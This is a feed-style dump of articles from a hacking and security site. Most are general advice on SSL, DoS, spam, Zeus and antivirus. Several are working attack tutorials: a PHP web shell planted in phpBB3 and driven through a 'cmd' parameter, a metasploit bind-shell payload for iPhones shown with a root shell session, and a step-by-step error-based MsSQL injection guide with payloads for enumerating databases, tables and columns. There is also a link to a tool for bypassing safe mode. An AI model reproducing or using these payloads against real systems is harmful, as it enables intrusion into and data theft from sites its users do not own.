Articles http://www.astalavista.com/page/articles Fri, 10 Feb 2012 00:42:08 +0000 43200 Manage articles <![CDATA[What is SSL & How it works?]]> http://www.astalavista.com/page/articles/_/general-information/what-is-ssl-how-it-works-r58 OK lets start !

SSL (Secure Sockets Layer) is the most widely used and most standard security technology for establishing an encrypted link between a web server and a browser.If a link is encrypted, it uses HTTPS protocol.

Whats the difference of HTTP and HTTPS protocol?
In simple HTTP link is not encrypted and used for standard communication and HTTPS link is implemented using Secure Sockets Layer (SSL) which is encrypted and used for secure communication.
How HTTP and HTTPS work?
Assume that there exists two communication parties A (client) and B (server). Now A sends a message or password to B and a intruder (hacker) gets an unauthorized access in between.
Now lets study both the cases HTTP and HTTPS.
case-1:
<a href="http://3.bp.blogspot.com/_DDqbEuQE5HE/TPII6UVHyUI/AAAAAAAAAOo/Augm3tJZnTQ/s1600/http-without+ssl.PNG" style="margin-left: 1em; margin-right: 1em;">Posted Image
From case-1 you got to know that if an intruder (hacker) gets an unauthorized access of an on going communication between A and B, A will lose his/her confidential message or password like "helloworld".

case-2:
Posted Image
From case-2 you got to know that if an intruder (hacker) gets an unauthorized access of an on going communication between A and B, A will not lose his/her confidential message or password like "helloworld" because the message or password is encrypted.So the hacker gets the encrypted password like "Xu587Tyus)".

How SSL works?
Each SSL Certificate consists of a Public key and a Private key. The public key is used to encrypt the information and the private key is used to decrypt it. When your browser connects to a secure domain, the server sends a Public key to the browser to perform the encryption. The public key is made available to every one but the private key(used for decryption) is kept secret. So during a secure communication, the browser encrypts the message using the public key and sends it to the server. The message is decrypted on the server side using the Private key(Secret key).

How to identify weather your connection is secure or not?
SSL is given with a key indicator to let the user know that they are currently protected by an SSL encrypted session - the lock icon in the lower right-hand corner, clicking on the lock icon displays your SSL Certificate and the details about it.
Posted Image

So the bottom line is, whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you have a secure communication. A secure communication is a must in these situations. Otherwise there are chances of Phishing.

Hope this helps you! pls pass your comments.
SOURCE: Hover pc Hacks Posted Image]]> Tue, 30 Nov 2010 11:32:48 +0000 06409663226af2f3114485aa4e0a23b4 The (h) hack licence http://www.astalavista.com/page/articles/_/lectures/the-h-hack-licence-r56 Posted Image

The hack license, symbolized by (h) licensing program, application, website or any other content built in source code as "hacked and open to new hacks."

A (h) assumes that the licensed content from another that was before another license (without telling what content and its license) and has undergone so many changes that their existence has proved to be necessary to have materially different from the original features, which were "hacked".

Content licensed with (h) was hacked, ie unchanged from its original features, either to improve or to meet other features.

By licensing content with (h) recognizes that the developer used the basis of other content to do something new, and more: it gives the opportunity for others to do the same with what he created.

The origin of (h) Licence
A Hack License was instituted publicly by Zer0, also known as Hiago Robinson in 2004.
Posted Image
Zer0 used this symbol in. Ico to mark the hacks that made from programs and applications, and then organize the folders on your computer, with only two folders, each with the same content, only one with unique programs and applications and another folder with the "hacks". At the start hacking on the web, the markings ©, that simplicity, they mean: "Content protected by copyright laws," were replaced by (h), which means "Content changed and available free to change with the purpose improvement. "]]> Mon, 15 Nov 2010 15:43:49 +0000 1c9ac0159c94d8d0cbedc973445af2da All about Denial Service Attacks and the Securi... http://www.astalavista.com/page/articles/_/general-information/all-about-denial-service-attacks-and-the-securi-r54
What are DoS and DDoS attacks?

These are attacks, which may be orchestrated by a person or a group of people to disallow the access of a website or service to online users. This is caused by a dysfunction of the website or its security failure due to a DoS or DDoS attack. It is classified as an expert hacking technique and it is punishable by law.

How do hackers create DoS attacks? Here are some methods that can be used to compromise the security of your website, computer and operating system.

Influx of Massive request to the website

Massive traffic influx can “crash” a website. Saturating the website with simultaneous external requests will effectively stop genuine organic traffic from accessing the website. If it does not crash, such action will slow down the server or reset the computer. Unless the website has the capacity to handle such occurrences, then security is breached and it may take a while to resolve the damage. A site’s bandwidth or disk space simply cannot accommodate such numerous requests simultaneously.

Malfunction of routers

Hackers can also destroy your website through your routers .Familiarize yourself with what routers your website can work with efficiently. If you are a small website, you may want to use static routing. For bigger websites, you can utilize complex topologies to ensure appropriate security for your website. If you can identify the signatures, you can use the IPS based prevention where your IPS or Intrusion Prevention Systems can help you ward off these DoS attacks. However, if you do not have the signatures, then it would be useless.

Communication obstruction

Obstruction occurs between you and the users of your website, because your computer may be too slow to respond, upload or download files. Saturation of your processor could occur, and can completely crash your operating system. You can no longer connect to your website because of the infiltration of all of your security systems by DoS attacks.

Triggering codes or unauthorized instructions sequencing

This will “confuse” your security or operating system and can cause it to get bogged down. It could also reset your whole computer system and destroy all the files in your hard disk. Hackers are capable enough to create trigger codes for the destruction of your website. All of your diligent work and business opportunities can be destroyed by just one destructive code.

Peer to peer file sharing

When peer-to-peer file sharing is done like when watching international boxing bouts or tennis championships, the hacker can direct all peer-to-peer viewers to the target website. When thousands of online users connect to the target website, the tremendous amount of connections can harm your server, computer, and your online resources. If you are the target website then your security system is at a risk too.

Other methods used by professional hackers to harm a website include teardrop attacks, degradation attacks, nuke attacks, reflected, or distributed attacks, and permanent denial of service attacks. All of these attacks can be used in destroying your website’s security and preventing online users to access your website.

Sanctions for DoS and DDoS attacks

In the United Kingdom, these illegitimate hacking activities can mean a 10-year imprisonment. In the United States on the other hand, it is considered as a federal crime and is tried as such. Other countries have also adapted their own laws concerning DoS or DDoS attacks to ensure the security of websites, but there are still numerous problems to resolve, as hackers grow more and more intelligent and highly skilled in their malicious activities.]]> Tue, 19 Oct 2010 09:01:16 +0000 1d7f7abc18fcb43975065399b0d1e48e Security Advice To Protect Against SPAM http://www.astalavista.com/page/articles/_/general-information/security-advice-to-protect-against-spam-r53
Many spam emails messages also contain various forms of viruses, worms and other forms of malware that can harm a computer and compromise its security. This can be inconvenient for people who use computers at home, but it can have more pronounced negative effects in a company setting. This is because company computers are often connected to a network and if one terminal’s security is bypassed and it gets infected with malware, the chances of other computers in the network getting infected can go up as well.

There are many ways of controlling spam depending on how you use your emails accounts. Free email accounts like gmail and yahoo mail often have spam security filters that do an acceptable job at sorting out spam emails. Many email clients like outlook and apple mail also have built in features that can help with managing spam. However, if you need a more robust and powerful solution to controlling spam, then there are a lot of really good commercial security products available in the market today.

There are a number of different methods which can be used to block off spam; methods such as spam reporting, spam tracing, hiding your email from spammers, and spam blocking and filtering. All these methods are quite useful and will definitely lessen the amount of spam sent to your email. The following are short explanations on how these security techniques work.

Spam reporting
This can be done quite simply as most emails come with this feature automatically built in. One has to simply label the received email as spam and the email provider will automatically block it off.

Spam tracing
This is normally not necessary as there are much simpler ways to get rid of spam. This entails having to track down the sender and then reporting to your email provider.

Hiding email
The easiest way to avoid spam is to avoid posting your email around the Internet. It is not a good idea to leave behind your email in forums or leave them visible within social networking sites as spammers will gladly send emails to any address.

Blocking and filtering
Once spam is received, the email address of the sender can easily be blocked off and one would never have to worry about receiving email from them again as their email will be automatically filtered for your security.]]> Mon, 04 Oct 2010 14:07:19 +0000 b3e3e393c77e35a4a3f3cbd1e429b5dc How to Improve Your Computer’s Security http://www.astalavista.com/page/articles/_/guides/how-to-improve-your-computer%e2%80%99s-security-r52

Use your Firewalls

Most operating systems come with built-in firewalls that can be used to improve computer security. However, not many people know how to use their firewalls properly. A firewall with inadequate settings can easily be breached by hackers. This is one of the reasons why it is so important to learn how to configure your firewall with the correct security settings.


Learn about your Computer’s Entry Points

Entry points are very similar to doors that a hacker can use to gain access to your system. By learning about all of the entry points your computer has, you will be able to improve your computer’s security and prevent hacking attempts on your system. However, most computers have numerous entry points and it can be difficult to learn about them all. This is where security experts can help you. This is especially important if you run a small network in your business.


Increase your Awareness

Hacking is now an unfortunate part of the world we live in. This is one of the reasons why you should do all you can to learn about hacking and computer security measures. Even if you are not a tech-savvy person, you can still keep your computer safe by learning about the importance of security updates, program patches and anti-virus software. There are many easy-to-use tools available in the market today; all you need to do is learn which items you need and how to use them effectively.


Testing your Network’s Security

Performing an attack and penetration test is a very good way of analyzing the security of your network. This method is used to identify potential weak points in your computer network. Once you identify loopholes, you can then start implementing special measures to make your network harder to crack.


Use Passwords

This is one of the simplest and most effective ways of making your system more secure. Learn how to create strong passwords that are difficult to crack. This will make your system very difficult to hack and access. You should also make it a habit to change your passwords every two months or so. Well-made passwords make use of both numbers and letters to make it more difficult for uninvited guests to log onto your computer.


Monitor your Device Services

Your system uses many devices and services to work properly. However, some of these services pose a significant security threat to your system. You should disable services that you do not need to minimize the risk of someone breaking into your system.


Use Anti-Virus Software

There are many reliable anti-virus software packages in the market today. This is one of the best ways to improve your computer’s security from viruses, Trojan horses, worms, bots, and hackers.]]> Wed, 29 Sep 2010 07:43:40 +0000 37a749d808e46495a8da1e5352d03cae On Zeus Botnet and Security http://www.astalavista.com/page/articles/_/general-information/on-zeus-botnet-and-security-r51
The current zeus botnet is estimated to have compromised the security of millions of computers around the world. It is worth noting that as of October 2009, zeus has sent out over 1.5 million phishing messages through Facebook. It was on November 2009 that an English couple was arrested for allegedly using zeus as a hacking tool to steal personal data. There were also a total of over 9 million phishing emails sent supposedly through Verizon wireless. It is worth noting that zeus is still active and that there is a report which states that credit cards of over 15 unnamed US banks have had their security compromised. The most recent outbreak of zeus is now being called Kneber.

The zeus botnet is known to only target windows machines and computers, specifically those running on windows XP professional SP2. Reports state that there are currently no infections within computers that run on windows 7. Zeus is normally found within machines in corporate and government infrastructures, but personal home computers can be infected as well.
The zeus botnet can be used to bypass the security of online social networks, email accounts and financial services. Sites whose security has been seriously compromised are Facebook, Yahoo and Sonico, to name a few. It is known that focus has been placed on email and social networking sites, but zeus is now targeting the security of online banking sites as well.

It is not difficult to find zeus on the Internet. It can normally be found within underground hacking forums. There are even zeus builder toolkits which allow hackers all around the world to customize zeus and use its functions any way they want. The zeus botnet normally breaches a user’s security through spam emails which may seem to be from legitimate websites. These emails can contain links to various different downloads which will usually house a variant of zeus botnet. If the infected file is downloaded, zeus will automatically be installed within the computer. Common ways of tricking people to download an infected file while within social networking sites is to send users messages which claim that they must download an update patch or tool which is needed to run through the site more smoothly or such.

Once it is installed, zeus will wait until the user connects to the Internet and downloads a configuration file which will have a list of web banking websites to gather the user’s information. Once an infected computer is used to access a banking website, the zeus botnet will launch a keylogger function and save all the keystrokes of the user. Some variants of zeus will even have an agent within the web browser and may inject false fields within web forms which the common user will normally fill up, which leads to him to compromising his security even further. Zeus will then send this information to the hacker. One would be wise to periodically have virus scans in order to check whether or not their system is clean and make sure that the security is uncompromised.]]> Mon, 27 Sep 2010 07:20:51 +0000 a8f15eda80c50adb0e71943adc8015cf Uploading shell into phpbb3 via admin account http://www.astalavista.com/page/articles/_/lectures/uploading-shell-into-phpbb3-via-admin-account-r50 
system($cmd);

After this, go to 
www.victim.com/forum/faq.php?cmd=[command]

God Luck !!
fLaShcRew.In]]> Sun, 26 Sep 2010 12:28:45 +0000 7ef605fc8dba5425d6965fbd4c8fbe1f What is Cryptovirology? http://www.astalavista.com/page/articles/_/lectures/what-is-cryptovirology-r49
How is security attained by a system?

Cryptology deals with the theories and application of formulas and algorithms to attain security in a system. It further involves cryptography and cryptanalysis.

Cryptography studies the process or skill of communicating in or deciphering secret writings or ciphers. In order for data to possess a certain level of security for storage or transmission, it must be stored or transmitted in a form that is difficult to understand by an unauthorized individual. The “intractability” or difficulty of the mathematical equations used in the security process accounts for the basis of cryptography. On the other hand, cryptanalysis studies ciphers, ciphertext or cryptosystems with a view to finding weaknesses in them that will permit retrieval of the plaintext from the ciphertext without necessarily knowing the key or the algorithm, thus breaking the security.

Cryptovirology, therefore, involves program developers who use cryptography to design powerful malicious software to attack the security of a system or security of a user’s information.

How did this field begin?

Cryptovirology began when virus writers tried to break the security of a system through the use of public-key cryptography. Public-key cryptography breaks the symmetry between what an antivirus analyst sees regarding a virus and what the virus writer sees. The antivirus analyst sees only a public key, while the virus writer sees both a public key and a private key.

Historians say that the first attack in the field of cryptovirology involved cryptoviral extortion. In here, hackers used a virus or worm or Trojan hybrid to encrypt files of a victim and literally extort money from the victim. After hacking, the victim has to pay the hackers to receive the needed session key just to be able to get the files back. These viruses also go by the name ransomware.

What are the dangers of cryptovirology on security?

Cryptovirology poses a threat on security because it can be used to extort money by file hacking. In addition to this, it attacks and steals private information such as private keys. Private keys are stolen with the use of asymmetric backdoors. The attacker, and no one else, uses an asymmetric backdoor. This asymmetric backdoor differs from traditional symmetric backdoors because anyone that finds it can use it.

Kleptography, a subfield of cryptovirology, deals mainly with the study of asymmetric back doors in key generation algorithms, digital signature algorithms, key exchanges, and so on.

Attackers use cryptoviruses in deniable password snatching used with cryptocounters, private information retrieval, and to secure communication between different instances of a distributed cryptovirus.

What are examples of cryptoviruses?

Examples of cryptoviruses include Tremor Virus, One-half virus, Tro_Ransom.A virus, Virus, and Win32.Gpcode.ag.

Viruses such as the Tremor Virus use cryptography to avoid detection by antivirus software.

Virus writers can also use cryptography to enhance the longevity of the virus, such as in the case of One-half virus.

Tro_Ransom.A asks the owner of the infected machine to send $10.99 to a given account through Western Union. Tro_Ransom.A exemplifies a ransomware used for cryptoviral extortion.

Virus.Win32.Gpcode.ag instructs the owner of the machine to email a given mail ID if the owner desires the decryptor. The user will then pay a certain amount as ransom in return for the decryptor.

All of these viruses threaten a system or a person’s security.]]> Wed, 15 Sep 2010 07:19:27 +0000 f2217062e9a397a1dca429e7d70bc6ca HOW TO ENTER ON IPHONE USING SHELLCODE CUSTOM V... http://www.astalavista.com/page/articles/_/lectures/how-to-enter-on-iphone-using-shellcode-custom-v-r48 Since the shell code is no fun unless you can do something with it,I added support for iphone executables to the msfpayload command.This allows you to generate standalone bind/reverse shell executables using the following syntax metasploit commands:

$ msfpayload osx/armle/shell_bind_tcp LPORT=4444 X > iphone_bindshell.bin

This binary can be copied to the iphone using SSH or Iphuc/iPhoneTool and executed.

$ ssh root@192.168.1.4
# chmod +X iphone_bindshell.bin
# ./iphone_bindshell.bin
# ./iphone_bindshell.bin
--
$ nc –vvn 192.168.1.4 4444
(UNKNOWN) [192.168.1.4] 4444 (krb524) open
id
uid=0 euid=1 gid=0 (wheel) groups=0 (wheel)
uname -a
Darwin Metasploit Developer's iphone 9.0.0d1
Darwin Kernel Version 9.0.0d1: Fri Jun 22 00:38:56 PDT 2007;
root:xnu-933.0.1.178.obj~1/RELEASE_ARM_S5L8900XRB
iphone1,1 Darwin

Once the XOR encoder is done,the only step left is to find the bugs and write the exploits.]]> Thu, 09 Sep 2010 14:06:25 +0000 47d1e990583c9c67424d369f3414728e <![CDATA[Sun Symlink Safe-Over [Bypass Forbidden Error -...]]> http://www.astalavista.com/page/articles/_/lectures/sun-symlink-safe-over-bypass-forbidden-error-r47 this tool bypass forbidden[403] and permisson denied error in symlink methode...
and bypass php safe-mode prior 5.3.1 version

video:http://www.4shared.com/file/F-DOODHu/SS-Film.html
tool:http://tool.sun-army.org]]> Mon, 06 Sep 2010 18:27:38 +0000 8d5e957f297893487bd98fa830fa6413 Exctract Table and Columns name in MsSQL ( .cfm... http://www.astalavista.com/page/articles/_/lectures/exctract-table-and-columns-name-in-mssql-cfm-r46 ################################### Title: Exctract Table and Columns name in MsSQL ( .cfm & .asp ) - Author: DaNZeL - WebSite: http://www.GoldHaxors.Com - Hotmail: danzel@flash-crew.com - Yahoo: FlashcRew@Yahoo.com ###################################

Hi allz ..
I want to tech you how to exctract Tables And Columns from MsSQL shop's ..
some people has ben a interes for that ..
and i write for you .

-
Get the Version:
and 1=convert(int,@@version)--sp_password
-
Get Server Name :
and 1=convert(int,@@servername)--sp_password
Demo:
http://site.com/view.cfm?id=56 and 1=convert(int,@@servername)--sp_password
[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting the nvarchar value 'SERVER NAME HERE' to a column of data type int.

-
Get data base name:


and 1=convert(int,db_name())--sp_password
and 1=convert(int,db_name(1))--sp_password
and 1=convert(int,db_name(2))--sp_password
and 1=convert(int,db_name(3))--sp_password
and 1=convert(int,db_name(4))--sp_password
etc ...


Demo:
http://site.com/view.cfm?id=56 and 1=convert(int,db_name())--sp_password
http://site.com/view.cfm?id=56 and 1=convert(int,db_name(2))--sp_password

[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting the nvarchar value 'DB NAME HERE' to a column of data type int.


-
Get system user :
and 1=convert(int,system_user)--sp_password

http://site.com/view.cfm?id=56 and 1=convert(int,system_user)--sp_password
[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting the nvarchar value 'System User' to a column of data type int.


-

-
Get the first Table :
and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password
demo :
http://site.com/view.cfm?id=56 and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password
We get this error:
[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting the nvarchar value 'First TAble Here' to a column of data type int.

-

Get the second table:
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("FIRST-TABLE-HERE")))--sp_password
example:
http://site.com/view.cfm|id=56 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("FIRST-TABLE-HERE")))--sp_password

[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting the nvarchar value 'Second Table is Here' to a column of data type int.


-
Get Next Table 
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('table1,'Table2')))--sp_password


-

Get the 3 table :
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("Second-Table-Here")))--sp_password
http://site.com/view.cfm?id=56 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("Second-Table-Here")))--sp_password
[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting the nvarchar value '3 Table' to a column of data type int.

And we get the 3 table .. for get more table go with step with last table ..


--

Now you need to get the columns in any table :

We goo with this process ..

Get first columns from table 1 :
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")))--sp_password
http://site.com/view.cfm?id=56 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")))--sp_password
and we get the first columns in this table

[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting the nvarchar value 'Column Name here' to a column of data type int.

--

Get second column :
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE") and column_name not in ("FIRST-COLUMNS-HERE")))--sp_password

http://site.com/view.cfm?id=56and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE") and column_name not in ("FIRST-COLUMNS-HERE")))--sp_password
and we will get te second columns

[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting the nvarchar value 'Second Column here' to a column of data type int.

--

Get 3 columns :
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE") and column_name not in ("SECOND-COLUMNS-HERE")))--sp_password
http://site.com/view.cfm?id=56and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE") and column_name not in ("SECOND-COLUMNS-HERE")))--sp_password
and we have column number 3

[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting the nvarchar value 'COLUMN-NR-3' to a column of data type int.


and in this method you use in next step ..

Don't Forget to change the commands in SQL Char
For any help Email me

Peace
Danzel / Flashcrew]]> Sun, 05 Sep 2010 10:10:18 +0000 a5e00132373a7031000fd987a3c9f87b Disable Wireless When Connected to LAN http://www.astalavista.com/page/articles/_/general-information/disable-wireless-when-connected-to-lan-r45
The above scenario is becoming a day by day issue as wireless networks become common standard in every laptop. Lan-Secure Wireless Auto Disable has the perfect solution to deal with the organization wireless management and security. The software will automatically disable WiFi adapters on computers that connected to the company network with LAN cable and re-enable WiFi when the LAN cable is disconnected from the computer.

How does it work?
Wireless Protector Software is installed on windows organization platform and all organization laptops need to be added to the protected computers list. The software will scan all protected laptops and using the network administrator username and password will create a service in each remote laptop. The service that installed on the remote laptops will try to communicate with Wireless Protector Software that installed on the organization LAN each time there is a change in the connectivity status of its network adapters. Upon receiving confirmation from the software the remote laptop will automatically disable the WiFi adapter if the laptop LAN cable is connected to the organization network and re-enable it back when the LAN cable is plugged out from the laptop. Wireless Protector Software will verify that the protection service is running on the remote laptops of the organization and collect protection events and WiFi activation status for each laptop.

How does it protect the organization?
A remote computer WiFi will be disabled only when receiving confirmation from Wireless Protector Software that installed on the organization LAN. That mechanism will assure that protected laptops WiFi adapter will be disabled only when it connected to the organization LAN and not in any place outside the organization. When connected to the organization LAN remote protected laptops will disable their WiFi adapter and the remote user will receive notification message about it. Trying to by passing this mechanism manually by the remote user will fail while the remote laptop is connected to the organization LAN. The software will notify the administrator about the protection status of each remote laptop and collect WiFi disabling events from the protected laptops. The software will assure that the organization LAN will be protected from unsecured wireless connections and from duplicate network connections.

Conclusion
Wireless networks are still the most convenient way for fast and easy communication while WiFi adapters became a standard in every laptop. However, keeping wireless networks accessible to public networks leave them unsecured and vulnerable to potential intruder’s attacks. Wireless Protector Software will protect the organization LAN from wireless networks vulnerabilities and still enable to use wireless communication freely and safely.]]> Fri, 03 Sep 2010 08:26:54 +0000 2b24d495052a8ce66358eb576b8912c8 Computer Security Risks http://www.astalavista.com/page/articles/_/general-information/computer-security-risks-r44
Hacking is especially dangerous to people who use DSL or cable to connect to the Internet. This is due to the fact that these types of connections often use a static IP address that hackers can use to get into your system. Computers using dynamic IP addresses are more difficult to access because their IP addresses regularly change. There are many tools littering the Internet that unscrupulous individuals can use to hack into your computer without you knowing it. They leave no trace on your system and chances are that you will never realize that anyone actually hacked into your system until it is already too late.

You should go check out a diagnostic site that can give you an idea regarding the vulnerabilities in your system’s security. Just keep in mind to stick to the reputable diagnostic sites just to be safe. You will also have to take a closer look at your file sharing and printer sharing settings. Hackers can easily use these features to take control of your system.

Unfortunately, computers normally have thousands of other ports that can be used to bypass your system’s security. These ports are normally used to download files, surf the Internet or send emails. However, these ports can also be used as doors to access your files and folders. You can download port monitoring software to keep a closer eye on your active ports.

It is never a good idea to share a connection with people you don’t know. However, there are safe ways of splitting your Internet connection to multiple computers while still making it difficult for hackers to take over. There are many products that allow you to do this. All you have to do is visit any reputable computer store or website that sells these products and you’re good to go.

You should also make use of anti-virus software to beef up your computer’s security. There are hundreds of anti-virus software packages available today, but it is best to stick with reputable brands that have a good support system. Once you have purchased and installed the software, remember to update it regularly so your computer can take care of new viruses and other type of malware with relative ease.

Using a firewall is also one of the best ways to safeguard your system. Many operating systems like Microsoft Windows ship with their own firewalls. However, learning how to properly configure your firewall can be a very tricky affair. It is best to refer to online tutorials on how to configure your firewall.

An improperly-configured firewall can easily be breached by hackers. However, there are many settings and features that you can fiddle with to improve your system’s security. Hacking is now a part of our daily lives and it is best to be prepared in case you are targeted by these unscrupulous cyber-criminals.]]> Tue, 31 Aug 2010 07:30:56 +0000 0a09c8844ba8f0936c20bd791130d6b6 Computer Security: Dealing with Hackers http://www.astalavista.com/page/articles/_/lectures/computer-security-dealing-with-hackers-r43
The first thing that you will have to do is to purchase a good anti-virus system. There are many good anti-virus solutions in the market and you can pick one that you are comfortable with. After installing it into your computer, you should keep in mind that you will have to update it regularly. This is important in stopping new viruses and hacking techniques from taking advantage of the inherent vulnerabilities in your system. You should learn how to use your software and it pays to know how to quarantine, repair and delete infected files and folders.

Your firewall is the next thing that you should pay close attention to. There are two types of firewalls; namely, software and hardware. Firewalls help users prevent hackers from accessing the files and folders on your computer. Most operating systems come with built-in firewalls. You should learn how to use your firewall as early as possible.
When improving the security of your system, you will also have to keep a close eye on system events. You can do this by regularly checking your system log for any suspicious activity. You should start getting worried if you are constantly getting notices regarding unknown programs that you did not install yourself. You should also be on the lookout for TCP/IP messages and other system warnings.

You should also be diligent in downloading and installing operating system updates. These are very important to the security of your computer. Software providers often provide updates when they find and fix vulnerabilities and loopholes that hackers can take advantage of. Updating regularly will make it very difficult for people trying to gain access to your computer. As soon as new patches are available for your programs, you should download and install them right away. Hackers usually take advantage of the vulnerabilities in common programs like web browsers, email clients and programs like Adobe Acrobat to get into your system. Security fixes often eliminate these vulnerabilities, so hackers will have to find new loopholes to exploit your system. This game of cat and mouse between software developers and hackers has been going on for a while now and will likely continue in the future.

Hackers are now also capable of taking control of your computer’s webcam, if you have one. This is more than just a breach in computer security and your privacy is now at stake. It is a well-known fact that everything connected to your computer can be used and accessed by someone who has already gained access to your computer. This includes devices like microphones and webcams. In fact, a number of hackers have already been caught after successfully taking control of other people’s webcams and allowing them to see what the victims are doing.

Thankfully, webcam hacking is usually accomplished using specially-made viruses. These viruses can be detected and dealt with using any reputable anti-virus software. This is just one of the reasons why computer security is so important these days. The best way to keep prying eyes from using your webcam is still one of the simplest solutions to this security problem. All you have to do is disconnect or cover your webcam when not in use.]]> Mon, 30 Aug 2010 07:59:02 +0000 903ce9225fca3e988c2af215d4e544d3 Website Security Against Black Hat SEO and Hackers http://www.astalavista.com/page/articles/_/general-information/website-security-against-black-hat-seo-and-hackers-r42
The impetus behind these undesirable activities lies on a misguided, if not twisted take on search engine optimization. Search engine optimization or SEO per se, is not bad. The primary aim of SEO is to improve rankings of websites so that they would be more “crawlable” or easily accessible for search engines. A higher website ranking means more volume of traffic on your site and more traffic translates to higher website profitability through conversions of visitors into actual customers. But this aspect requires another discourse. For now let’s focus on some devious internet practices.

The negative connotation that has been associated with SEO can be attributed most of the time to black hat SEO practices. Black hat SEO includes, among other shady tactics, keyword stuffing, cloaked pages, link farming, spamdexing and blog comment spamming. The most commonly applied tactics is spamming or in laymen’s term, sending barrages of unwanted email without the consent of webpage or email account owners.

Unlike white hat SEO that relies mostly on favorable impressions on the social media community through quality contents, link building and other evocative methods, black hat SEO tends to be a security issue among online users. It is not that uncommon for personal emails to be flooded with spam mails that come with viruses. These types of viruses, most of the time, are designed to freely access personal online accounts. The idea is to spy on a user’s profile so that the spam mail sender can streamline a particular product to be promoted. Actually, it is like those privacy-invasion tactics employed on George Orwell’s dystopian landscape of a novel 1984. A digital and more adamant take on privacy invasion, that is.
Internet hacking these days is more advanced and organized. Apart from black hat SEO tactics, some also employ gray hat practices. Gray hat SEO, according to SEO experts is hard to define. They are not actually something that falls in between black hat and white hat. It is more about practices that are more beneficial than standard. One good example of gray hat SEO is link-buying or shopping links to establish high ranking. Still ill-defined, this practice is also prone to hacker-exploitation thus also a security risk when it goes out of hand.

To minimize these security risks, it is best to undertake preemptive measures such as email security protection schemes offered by authoritative sites. Hackers tend to attack vulnerable websites and accounts to promote services and products without the owner’s content. That is why, it is best to optimize your site to protect it from these harmful activities. Online users can also report these activities to Google and Yahoo. These search engines provide security measures against internet hacking and online security risks.

A basic knowledge on search engine optimization and how search engine operates is also a great help in detecting whether what is being promoted to you is white hat, black hat or gray hat SEO. There is no excuse in not grasping the basics of these things, especially in the age of information technology. The further advancement of the information super highway provides online user easy access on security risk management and essential knowledge on how to protect your account against online hackers. Employing preventive measures is the best way to keep your website or account safe and free from unmitigated online security risks.]]> Fri, 27 Aug 2010 08:44:50 +0000 a8baa56554f96369ab93e4f3bb068c22 Why an Anti-Virus Alone is not enough Protectio... http://www.astalavista.com/page/articles/_/general-information/why-an-anti-virus-alone-is-not-enough-protectio-r41
Actually, an anti-virus program could help people decrease the risks of infecting their computer’s programs and files. However, an anti-virus program alone is not enough protection from electronic viruses. Some viruses are already transmitted through emails and various websites, which could cause your computer to crash or have confidential information about their servers stolen.

If you want to decrease the possibility of experiencing this kind of problem, you should quit depending on your anti-virus alone. Different kinds of viruses and malwares could actually cause severe damage to your servers once you fail to acquire added protection for your computer’s system.

Here are some of the different threats that are commonly transmitted through electronic mail today.

Buffer overflows

Buffer overflows could infect your computer by controlling its executions and functions. An attacker could easily exploit a bug in your affected computer program and use this to control various executions in your computer. Some attackers could even cause your entire computer program to crash.

Trojans in electronic mails

Trojans that are transmitted through emails could actually do two different things to your computer. Some could cause a breach of security in your network and steal important information from your servers. Meanwhile, some Trojans could also cause damage to your computer’s program by activating a distributed attack in its server.

Since Trojan attacks usually require the need to be activated by the recipient itself, attackers usually disguise Trojan attacks in a number of different ways. Some keep their Trojan attacks as catchy email attachments in the form of jokes or videos that could encourage the victim to run the infected program.

HTML viruses or active content attacks

Attackers that use HTML viruses usually aim it towards those who constantly use web browsers. Some also use it for people who use HTML-enabled email accounts. These invasive attacks are usually created by using the special scripting features of HTML. After this, attackers execute codes into the computers of their victims in order to acquire private information about their victim’s server. Some attackers also use this kind of virus to cause a victim’s computer to display some website content.

Protecting your computer from powerful security threats

Now that you are already familiar with some of the most common viruses that most anti-virus programs are not able to detect, you can start thinking of additional ways to protect your computer from these security threats.

Since an anti-virus program is not enough to keep servers safe from viruses, some organizations have tried to install firewalls into their computer for added security. However, firewalls could only protect their Internet and prevent unauthorized users from accessing your computer’s network.

Firewalls do not have the capability to check the emails sent by those who are authorized to use your system. This makes you susceptible to attacks from email viruses that could still pass through a firewall security. Hence, an organization that uses a firewall and an anti-virus program is still prone to Trojan, HTML virus and buffer overflow attacks.

The best way to protect your network from these email-transmitted viruses is to check all the inbound and outbound emails created by your company before forwarding it to various users. You could also install an efficient anti-virus gateway on your mail server that could check all your email’s contents for viruses and security threats. You should look for programs that offer this kind of security against viruses and consider investing on that particular program.

If you want to keep your online business from identity thefts and profit losses due to system crashes caused by powerful viruses, you should always remember that an anti-virus and a firewall is not enough to secure your network. You should be willing to do everything it takes to protect yourself from these threats because they could cause tremendous losses to your online business or organization.]]> Wed, 25 Aug 2010 07:29:05 +0000 0f28b5d49b3020afeecd95b4009adf4c Today’s Hackers Versus Old-School Hackers http://www.astalavista.com/page/articles/_/general-information/today%e2%80%99s-hackers-versus-old-school-hackers-r38
Most of the old hackers have actually started working for computer security firms corporate software conglomerates. There are even some people like Jobs and Wozniak who have even allowed their company to patent their hardware and software.

